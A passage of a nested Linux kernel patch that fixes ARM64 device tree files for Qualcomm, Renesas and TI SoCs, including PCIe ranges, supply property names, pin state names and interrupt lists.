++++ b/arch/arm64/boot/dts/qcom/sc7180-trogdor-lazor-limozeen-nots-r4.dts
+@@ -26,7 +26,7 @@
+ 		interrupt-parent = <&tlmm>;
+ 		interrupts = <58 IRQ_TYPE_EDGE_FALLING>;
+ 
+-		vcc-supply = <&pp3300_fp_tp>;
++		vdd-supply = <&pp3300_fp_tp>;
+ 		hid-descr-addr = <0x20>;
+ 
+ 		wakeup-source;
+diff --git a/arch/arm64/boot/dts/qcom/sc7180-trogdor-pazquel.dtsi b/arch/arm64/boot/dts/qcom/sc7180-trogdor-pazquel.dtsi
+index d06cc4ea33756..8823edbb4d6e2 100644
+--- a/arch/arm64/boot/dts/qcom/sc7180-trogdor-pazquel.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7180-trogdor-pazquel.dtsi
+@@ -39,7 +39,7 @@
+ 		interrupt-parent = <&tlmm>;
+ 		interrupts = <0 IRQ_TYPE_EDGE_FALLING>;
+ 
+-		vcc-supply = <&pp3300_fp_tp>;
++		vdd-supply = <&pp3300_fp_tp>;
+ 		post-power-on-delay-ms = <100>;
+ 		hid-descr-addr = <0x0001>;
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sc7180.dtsi b/arch/arm64/boot/dts/qcom/sc7180.dtsi
+index e45726be81c82..4e7d93ff75c47 100644
+--- a/arch/arm64/boot/dts/qcom/sc7180.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7180.dtsi
+@@ -1512,7 +1512,7 @@
+ 				function = "qspi_data";
+ 			};
+ 
+-			qspi_data12: qspi-data12-state {
++			qspi_data23: qspi-data23-state {
+ 				pins = "gpio66", "gpio67";
+ 				function = "qspi_data";
+ 			};
+diff --git a/arch/arm64/boot/dts/qcom/sc7280-herobrine-villager.dtsi b/arch/arm64/boot/dts/qcom/sc7280-herobrine-villager.dtsi
+index 17553e0fd6fd9..43d76ea8869fb 100644
+--- a/arch/arm64/boot/dts/qcom/sc7280-herobrine-villager.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7280-herobrine-villager.dtsi
+@@ -33,7 +33,7 @@ ap_tp_i2c: &i2c0 {
+ 		interrupts = <7 IRQ_TYPE_EDGE_FALLING>;
+ 
+ 		hid-descr-addr = <0x20>;
+-		vcc-supply = <&pp3300_z1>;
++		vdd-supply = <&pp3300_z1>;
+ 
+ 		wakeup-source;
+ 	};
+diff --git a/arch/arm64/boot/dts/qcom/sc7280.dtsi b/arch/arm64/boot/dts/qcom/sc7280.dtsi
+index a407cd2579719..286d59d11f2e9 100644
+--- a/arch/arm64/boot/dts/qcom/sc7280.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7280.dtsi
+@@ -2068,7 +2068,7 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x01000000 0x0 0x40200000 0x0 0x40200000 0x0 0x100000>,
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x40200000 0x0 0x100000>,
+ 				 <0x02000000 0x0 0x40300000 0x0 0x40300000 0x0 0x1fd00000>;
+ 
+ 			interrupts = <GIC_SPI 307 IRQ_TYPE_LEVEL_HIGH>;
+@@ -3592,12 +3592,17 @@
+ 			      <0 0x88e2000 0 0x1000>;
+ 			interrupts-extended = <&pdc 11 IRQ_TYPE_LEVEL_HIGH>;
+ 			ports {
++				#address-cells = <1>;
++				#size-cells = <0>;
++
+ 				port@0 {
++					reg = <0>;
+ 					eud_ep: endpoint {
+ 						remote-endpoint = <&usb2_role_switch>;
+ 					};
+ 				};
+ 				port@1 {
++					reg = <1>;
+ 					eud_con: endpoint {
+ 						remote-endpoint = <&con_eud>;
+ 					};
+@@ -3608,7 +3613,11 @@
+ 		eud_typec: connector {
+ 			compatible = "usb-c-connector";
+ 			ports {
++				#address-cells = <1>;
++				#size-cells = <0>;
++
+ 				port@0 {
++					reg = <0>;
+ 					con_eud: endpoint {
+ 						remote-endpoint = <&eud_con>;
+ 					};
+@@ -4340,7 +4349,7 @@
+ 				function = "qspi_data";
+ 			};
+ 
+-			qspi_data12: qspi-data12-state {
++			qspi_data23: qspi-data23-state {
+ 				pins = "gpio16", "gpio17";
+ 				function = "qspi_data";
+ 			};
+diff --git a/arch/arm64/boot/dts/qcom/sc8280xp.dtsi b/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
+index 8363e82369854..966dca906bf07 100644
+--- a/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
+@@ -902,7 +902,7 @@
+ 			reg-names = "parf", "dbi", "elbi", "atu", "config";
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+-			ranges = <0x01000000 0x0 0x30200000 0x0 0x30200000 0x0 0x100000>,
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x30200000 0x0 0x100000>,
+ 				 <0x02000000 0x0 0x30300000 0x0 0x30300000 0x0 0x1d00000>;
+ 			bus-range = <0x00 0xff>;
+ 
+@@ -1001,7 +1001,7 @@
+ 			reg-names = "parf", "dbi", "elbi", "atu", "config";
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+-			ranges = <0x01000000 0x0 0x32200000 0x0 0x32200000 0x0 0x100000>,
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x32200000 0x0 0x100000>,
+ 				 <0x02000000 0x0 0x32300000 0x0 0x32300000 0x0 0x1d00000>;
+ 			bus-range = <0x00 0xff>;
+ 
+@@ -1098,7 +1098,7 @@
+ 			reg-names = "parf", "dbi", "elbi", "atu", "config";
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+-			ranges = <0x01000000 0x0 0x34200000 0x0 0x34200000 0x0 0x100000>,
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x34200000 0x0 0x100000>,
+ 				 <0x02000000 0x0 0x34300000 0x0 0x34300000 0x0 0x1d00000>;
+ 			bus-range = <0x00 0xff>;
+ 
+@@ -1198,7 +1198,7 @@
+ 			reg-names = "parf", "dbi", "elbi", "atu", "config";
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+-			ranges = <0x01000000 0x0 0x38200000 0x0 0x38200000 0x0 0x100000>,
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x38200000 0x0 0x100000>,
+ 				 <0x02000000 0x0 0x38300000 0x0 0x38300000 0x0 0x1d00000>;
+ 			bus-range = <0x00 0xff>;
+ 
+@@ -1295,7 +1295,7 @@
+ 			reg-names = "parf", "dbi", "elbi", "atu", "config";
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+-			ranges = <0x01000000 0x0 0x3c200000 0x0 0x3c200000 0x0 0x100000>,
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x3c200000 0x0 0x100000>,
+ 				 <0x02000000 0x0 0x3c300000 0x0 0x3c300000 0x0 0x1d00000>;
+ 			bus-range = <0x00 0xff>;
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sdm845.dtsi b/arch/arm64/boot/dts/qcom/sdm845.dtsi
+index f36c23e7a2248..c8b54e401eb98 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm845.dtsi
+@@ -198,7 +198,7 @@
+ 			reg = <0x0 0x0>;
+ 			enable-method = "psci";
+ 			capacity-dmips-mhz = <611>;
+-			dynamic-power-coefficient = <290>;
++			dynamic-power-coefficient = <154>;
+ 			qcom,freq-domain = <&cpufreq_hw 0>;
+ 			operating-points-v2 = <&cpu0_opp_table>;
+ 			interconnects = <&gladiator_noc MASTER_APPSS_PROC 3 &mem_noc SLAVE_EBI1 3>,
+@@ -222,7 +222,7 @@
+ 			reg = <0x0 0x100>;
+ 			enable-method = "psci";
+ 			capacity-dmips-mhz = <611>;
+-			dynamic-power-coefficient = <290>;
++			dynamic-power-coefficient = <154>;
+ 			qcom,freq-domain = <&cpufreq_hw 0>;
+ 			operating-points-v2 = <&cpu0_opp_table>;
+ 			interconnects = <&gladiator_noc MASTER_APPSS_PROC 3 &mem_noc SLAVE_EBI1 3>,
+@@ -243,7 +243,7 @@
+ 			reg = <0x0 0x200>;
+ 			enable-method = "psci";
+ 			capacity-dmips-mhz = <611>;
+-			dynamic-power-coefficient = <290>;
++			dynamic-power-coefficient = <154>;
+ 			qcom,freq-domain = <&cpufreq_hw 0>;
+ 			operating-points-v2 = <&cpu0_opp_table>;
+ 			interconnects = <&gladiator_noc MASTER_APPSS_PROC 3 &mem_noc SLAVE_EBI1 3>,
+@@ -264,7 +264,7 @@
+ 			reg = <0x0 0x300>;
+ 			enable-method = "psci";
+ 			capacity-dmips-mhz = <611>;
+-			dynamic-power-coefficient = <290>;
++			dynamic-power-coefficient = <154>;
+ 			qcom,freq-domain = <&cpufreq_hw 0>;
+ 			operating-points-v2 = <&cpu0_opp_table>;
+ 			interconnects = <&gladiator_noc MASTER_APPSS_PROC 3 &mem_noc SLAVE_EBI1 3>,
+@@ -2226,8 +2226,8 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x01000000 0x0 0x60200000 0 0x60200000 0x0 0x100000>,
+-				 <0x02000000 0x0 0x60300000 0 0x60300000 0x0 0xd00000>;
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x60200000 0x0 0x100000>,
++				 <0x02000000 0x0 0x60300000 0x0 0x60300000 0x0 0xd00000>;
+ 
+ 			interrupts = <GIC_SPI 141 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+@@ -2331,7 +2331,7 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x01000000 0x0 0x40200000 0x0 0x40200000 0x0 0x100000>,
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x40200000 0x0 0x100000>,
+ 				 <0x02000000 0x0 0x40300000 0x0 0x40300000 0x0 0x1fd00000>;
+ 
+ 			interrupts = <GIC_SPI 307 IRQ_TYPE_EDGE_RISING>;
+@@ -2705,7 +2705,7 @@
+ 				};
+ 			};
+ 
+-			qspi_data12: qspi-data12 {
++			qspi_data23: qspi-data23 {
+ 				pinmux-data {
+ 					pins = "gpio93", "gpio94";
+ 					function = "qspi_data";
+diff --git a/arch/arm64/boot/dts/qcom/sm8150.dtsi b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+index f790223ed8f5a..d338a987e8868 100644
+--- a/arch/arm64/boot/dts/qcom/sm8150.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+@@ -1783,8 +1783,8 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x01000000 0x0 0x60200000 0 0x60200000 0x0 0x100000>,
+-				 <0x02000000 0x0 0x60300000 0 0x60300000 0x0 0x3d00000>;
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x60200000 0x0 0x100000>,
++				 <0x02000000 0x0 0x60300000 0x0 0x60300000 0x0 0x3d00000>;
+ 
+ 			interrupts = <GIC_SPI 141 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+@@ -1879,7 +1879,7 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x01000000 0x0 0x40200000 0x0 0x40200000 0x0 0x100000>,
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x40200000 0x0 0x100000>,
+ 				 <0x02000000 0x0 0x40300000 0x0 0x40300000 0x0 0x1fd00000>;
+ 
+ 			interrupts = <GIC_SPI 307 IRQ_TYPE_EDGE_RISING>;
+diff --git a/arch/arm64/boot/dts/qcom/sm8250.dtsi b/arch/arm64/boot/dts/qcom/sm8250.dtsi
+index 927032863e2f1..d3f2f617047f1 100644
+--- a/arch/arm64/boot/dts/qcom/sm8250.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8250.dtsi
+@@ -1807,8 +1807,8 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x01000000 0x0 0x60200000 0 0x60200000 0x0 0x100000>,
+-				 <0x02000000 0x0 0x60300000 0 0x60300000 0x0 0x3d00000>;
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x60200000 0x0 0x100000>,
++				 <0x02000000 0x0 0x60300000 0x0 0x60300000 0x0 0x3d00000>;
+ 
+ 			interrupts = <GIC_SPI 141 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 142 IRQ_TYPE_LEVEL_HIGH>,
+@@ -1916,7 +1916,7 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x01000000 0x0 0x40200000 0x0 0x40200000 0x0 0x100000>,
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x40200000 0x0 0x100000>,
+ 				 <0x02000000 0x0 0x40300000 0x0 0x40300000 0x0 0x1fd00000>;
+ 
+ 			interrupts = <GIC_SPI 307 IRQ_TYPE_LEVEL_HIGH>;
+@@ -2024,7 +2024,7 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x01000000 0x0 0x64200000 0x0 0x64200000 0x0 0x100000>,
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x64200000 0x0 0x100000>,
+ 				 <0x02000000 0x0 0x64300000 0x0 0x64300000 0x0 0x3d00000>;
+ 
+ 			interrupts = <GIC_SPI 243 IRQ_TYPE_LEVEL_HIGH>;
+diff --git a/arch/arm64/boot/dts/qcom/sm8350-microsoft-surface-duo2.dts b/arch/arm64/boot/dts/qcom/sm8350-microsoft-surface-duo2.dts
+index 9c4cfd995ff29..e87514d8fd84e 100644
+--- a/arch/arm64/boot/dts/qcom/sm8350-microsoft-surface-duo2.dts
++++ b/arch/arm64/boot/dts/qcom/sm8350-microsoft-surface-duo2.dts
+@@ -341,6 +341,9 @@
+ 
+ &usb_1 {
+ 	status = "okay";
++};
++
++&usb_1_dwc3 {
+ 	dr_mode = "peripheral";
+ };
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sm8450.dtsi b/arch/arm64/boot/dts/qcom/sm8450.dtsi
+index 16a73288c1b37..d86ee3dd2270a 100644
+--- a/arch/arm64/boot/dts/qcom/sm8450.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8450.dtsi
+@@ -1726,8 +1726,8 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x01000000 0x0 0x60200000 0 0x60200000 0x0 0x100000>,
+-				 <0x02000000 0x0 0x60300000 0 0x60300000 0x0 0x3d00000>;
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x60200000 0x0 0x100000>,
++				 <0x02000000 0x0 0x60300000 0x0 0x60300000 0x0 0x3d00000>;
+ 
+ 			interrupts = <GIC_SPI 141 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+@@ -1835,8 +1835,8 @@
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+-			ranges = <0x01000000 0x0 0x40200000 0 0x40200000 0x0 0x100000>,
+-				 <0x02000000 0x0 0x40300000 0 0x40300000 0x0 0x1fd00000>;
++			ranges = <0x01000000 0x0 0x00000000 0x0 0x40200000 0x0 0x100000>,
++				 <0x02000000 0x0 0x40300000 0x0 0x40300000 0x0 0x1fd00000>;
+ 
+ 			interrupts = <GIC_SPI 307 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+@@ -1883,8 +1883,8 @@
+ 			phys = <&pcie1_lane>;
+ 			phy-names = "pciephy";
+ 
+-			perst-gpio = <&tlmm 97 GPIO_ACTIVE_LOW>;
+-			enable-gpio = <&tlmm 99 GPIO_ACTIVE_HIGH>;
++			perst-gpios = <&tlmm 97 GPIO_ACTIVE_LOW>;
++			wake-gpios = <&tlmm 99 GPIO_ACTIVE_HIGH>;
+ 
+ 			pinctrl-names = "default";
+ 			pinctrl-0 = <&pcie1_default_state>;
+diff --git a/arch/arm64/boot/dts/renesas/r8a774c0.dtsi b/arch/arm64/boot/dts/renesas/r8a774c0.dtsi
+index 151e32ac03683..ec7c7851519f4 100644
+--- a/arch/arm64/boot/dts/renesas/r8a774c0.dtsi
++++ b/arch/arm64/boot/dts/renesas/r8a774c0.dtsi
+@@ -49,17 +49,14 @@
+ 		opp-shared;
+ 		opp-800000000 {
+ 			opp-hz = /bits/ 64 <800000000>;
+-			opp-microvolt = <820000>;
+ 			clock-latency-ns = <300000>;
+ 		};
+ 		opp-1000000000 {
+ 			opp-hz = /bits/ 64 <1000000000>;
+-			opp-microvolt = <820000>;
+ 			clock-latency-ns = <300000>;
+ 		};
+ 		opp-1200000000 {
+ 			opp-hz = /bits/ 64 <1200000000>;
+-			opp-microvolt = <820000>;
+ 			clock-latency-ns = <300000>;
+ 			opp-suspend;
+ 		};
+diff --git a/arch/arm64/boot/dts/renesas/r8a77990.dtsi b/arch/arm64/boot/dts/renesas/r8a77990.dtsi
+index 3053b4b214978..3ed31ffd73a28 100644
+--- a/arch/arm64/boot/dts/renesas/r8a77990.dtsi
++++ b/arch/arm64/boot/dts/renesas/r8a77990.dtsi
+@@ -49,17 +49,14 @@
+ 		opp-shared;
+ 		opp-800000000 {
+ 			opp-hz = /bits/ 64 <800000000>;
+-			opp-microvolt = <820000>;
+ 			clock-latency-ns = <300000>;
+ 		};
+ 		opp-1000000000 {
+ 			opp-hz = /bits/ 64 <1000000000>;
+-			opp-microvolt = <820000>;
+ 			clock-latency-ns = <300000>;
+ 		};
+ 		opp-1200000000 {
+ 			opp-hz = /bits/ 64 <1200000000>;
+-			opp-microvolt = <820000>;
+ 			clock-latency-ns = <300000>;
+ 			opp-suspend;
+ 		};
+diff --git a/arch/arm64/boot/dts/renesas/r9a07g043.dtsi b/arch/arm64/boot/dts/renesas/r9a07g043.dtsi
+index 3f7d451b11995..95817679b3884 100644
+--- a/arch/arm64/boot/dts/renesas/r9a07g043.dtsi
++++ b/arch/arm64/boot/dts/renesas/r9a07g043.dtsi
+@@ -80,9 +80,8 @@
+ 			reg = <0 0x10049c00 0 0x400>;
+ 			interrupts = <SOC_PERIPHERAL_IRQ(326) IRQ_TYPE_LEVEL_HIGH>,
+ 				     <SOC_PERIPHERAL_IRQ(327) IRQ_TYPE_EDGE_RISING>,
+-				     <SOC_PERIPHERAL_IRQ(328) IRQ_TYPE_EDGE_RISING>,
+-				     <SOC_PERIPHERAL_IRQ(329) IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++				     <SOC_PERIPHERAL_IRQ(328) IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "int_req", "dma_rx", "dma_tx";
+ 			clocks = <&cpg CPG_MOD R9A07G043_SSI0_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G043_SSI0_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+@@ -101,9 +100,8 @@
+ 			reg = <0 0x1004a000 0 0x400>;
+ 			interrupts = <SOC_PERIPHERAL_IRQ(330) IRQ_TYPE_LEVEL_HIGH>,
+ 				     <SOC_PERIPHERAL_IRQ(331) IRQ_TYPE_EDGE_RISING>,
+-				     <SOC_PERIPHERAL_IRQ(332) IRQ_TYPE_EDGE_RISING>,
+-				     <SOC_PERIPHERAL_IRQ(333) IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++				     <SOC_PERIPHERAL_IRQ(332) IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "int_req", "dma_rx", "dma_tx";
+ 			clocks = <&cpg CPG_MOD R9A07G043_SSI1_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G043_SSI1_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+@@ -121,10 +119,8 @@
+ 				     "renesas,rz-ssi";
+ 			reg = <0 0x1004a400 0 0x400>;
+ 			interrupts = <SOC_PERIPHERAL_IRQ(334) IRQ_TYPE_LEVEL_HIGH>,
+-				     <SOC_PERIPHERAL_IRQ(335) IRQ_TYPE_EDGE_RISING>,
+-				     <SOC_PERIPHERAL_IRQ(336) IRQ_TYPE_EDGE_RISING>,
+ 				     <SOC_PERIPHERAL_IRQ(337) IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++			interrupt-names = "int_req", "dma_rt";
+ 			clocks = <&cpg CPG_MOD R9A07G043_SSI2_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G043_SSI2_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+@@ -143,9 +139,8 @@
+ 			reg = <0 0x1004a800 0 0x400>;
+ 			interrupts = <SOC_PERIPHERAL_IRQ(338) IRQ_TYPE_LEVEL_HIGH>,
+ 				     <SOC_PERIPHERAL_IRQ(339) IRQ_TYPE_EDGE_RISING>,
+-				     <SOC_PERIPHERAL_IRQ(340) IRQ_TYPE_EDGE_RISING>,
+-				     <SOC_PERIPHERAL_IRQ(341) IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++				     <SOC_PERIPHERAL_IRQ(340) IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "int_req", "dma_rx", "dma_tx";
+ 			clocks = <&cpg CPG_MOD R9A07G043_SSI3_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G043_SSI3_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+diff --git a/arch/arm64/boot/dts/renesas/r9a07g044.dtsi b/arch/arm64/boot/dts/renesas/r9a07g044.dtsi
+index 487536696d900..6a42df15440cf 100644
+--- a/arch/arm64/boot/dts/renesas/r9a07g044.dtsi
++++ b/arch/arm64/boot/dts/renesas/r9a07g044.dtsi
+@@ -175,9 +175,8 @@
+ 			reg = <0 0x10049c00 0 0x400>;
+ 			interrupts = <GIC_SPI 326 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 327 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 328 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 329 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++				     <GIC_SPI 328 IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "int_req", "dma_rx", "dma_tx";
+ 			clocks = <&cpg CPG_MOD R9A07G044_SSI0_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G044_SSI0_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+@@ -196,9 +195,8 @@
+ 			reg = <0 0x1004a000 0 0x400>;
+ 			interrupts = <GIC_SPI 330 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 331 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 332 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 333 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++				     <GIC_SPI 332 IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "int_req", "dma_rx", "dma_tx";
+ 			clocks = <&cpg CPG_MOD R9A07G044_SSI1_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G044_SSI1_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+@@ -216,10 +214,8 @@
+ 				     "renesas,rz-ssi";
+ 			reg = <0 0x1004a400 0 0x400>;
+ 			interrupts = <GIC_SPI 334 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 335 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 336 IRQ_TYPE_EDGE_RISING>,
+ 				     <GIC_SPI 337 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++			interrupt-names = "int_req", "dma_rt";
+ 			clocks = <&cpg CPG_MOD R9A07G044_SSI2_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G044_SSI2_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+@@ -238,9 +234,8 @@
+ 			reg = <0 0x1004a800 0 0x400>;
+ 			interrupts = <GIC_SPI 338 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 339 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 340 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 341 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++				     <GIC_SPI 340 IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "int_req", "dma_rx", "dma_tx";
+ 			clocks = <&cpg CPG_MOD R9A07G044_SSI3_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G044_SSI3_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+diff --git a/arch/arm64/boot/dts/renesas/r9a07g054.dtsi b/arch/arm64/boot/dts/renesas/r9a07g054.dtsi
+index 304ade54425bf..fea537d9fce66 100644
+--- a/arch/arm64/boot/dts/renesas/r9a07g054.dtsi
++++ b/arch/arm64/boot/dts/renesas/r9a07g054.dtsi
+@@ -175,9 +175,8 @@
+ 			reg = <0 0x10049c00 0 0x400>;
+ 			interrupts = <GIC_SPI 326 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 327 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 328 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 329 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++				     <GIC_SPI 328 IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "int_req", "dma_rx", "dma_tx";
+ 			clocks = <&cpg CPG_MOD R9A07G054_SSI0_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G054_SSI0_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+@@ -196,9 +195,8 @@
+ 			reg = <0 0x1004a000 0 0x400>;
+ 			interrupts = <GIC_SPI 330 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 331 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 332 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 333 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++				     <GIC_SPI 332 IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "int_req", "dma_rx", "dma_tx";
+ 			clocks = <&cpg CPG_MOD R9A07G054_SSI1_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G054_SSI1_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+@@ -216,10 +214,8 @@
+ 				     "renesas,rz-ssi";
+ 			reg = <0 0x1004a400 0 0x400>;
+ 			interrupts = <GIC_SPI 334 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 335 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 336 IRQ_TYPE_EDGE_RISING>,
+ 				     <GIC_SPI 337 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++			interrupt-names = "int_req", "dma_rt";
+ 			clocks = <&cpg CPG_MOD R9A07G054_SSI2_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G054_SSI2_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+@@ -238,9 +234,8 @@
+ 			reg = <0 0x1004a800 0 0x400>;
+ 			interrupts = <GIC_SPI 338 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 339 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 340 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 341 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++				     <GIC_SPI 340 IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "int_req", "dma_rx", "dma_tx";
+ 			clocks = <&cpg CPG_MOD R9A07G054_SSI3_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G054_SSI3_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+diff --git a/arch/arm64/boot/dts/ti/k3-am62-main.dtsi b/arch/arm64/boot/dts/ti/k3-am62-main.dtsi
+index ae1ec58117c35..0bdc16b0d08f2 100644
+--- a/arch/arm64/boot/dts/ti/k3-am62-main.dtsi
++++ b/arch/arm64/boot/dts/ti/k3-am62-main.dtsi
+@@ -461,7 +461,7 @@
+ 			     <193>, <194>, <195>;
+ 		interrupt-controller;
+ 		#interrupt-cells = <2>;
+-		ti,ngpio = <87>;
++		ti,ngpio = <92>;
+ 		ti,davinci-gpio-unbanked = <0>;
+ 		power-domains = <&k3_pds 77 TI_SCI_PD_EXCLUSIVE>;
+ 		clocks = <&k3_clks 77 0>;
+@@ -478,7 +478,7 @@
+ 			     <183>, <184>, <185>;
+ 		interrupt-controller;
+ 		#interrupt-cells = <2>;
+-		ti,ngpio = <88>;
++		ti,ngpio = <52>;
+ 		ti,davinci-gpio-unbanked = <0>;
+ 		power-domains = <&k3_pds 78 TI_SCI_PD_EXCLUSIVE>;
+ 		clocks = <&k3_clks 78 0>;
+diff --git a/arch/arm64/boot/dts/ti/k3-am625.dtsi b/arch/arm64/boot/dts/ti/k3-am625.dtsi
+index cea2cc7de5dd3..26d78562ceba7 100644
+--- a/arch/arm64/boot/dts/ti/k3-am625.dtsi
++++ b/arch/arm64/boot/dts/ti/k3-am625.dtsi
+@@ -147,7 +147,7 @@
+ 	L2_0: l2-cache0 {
+ 		compatible = "cache";
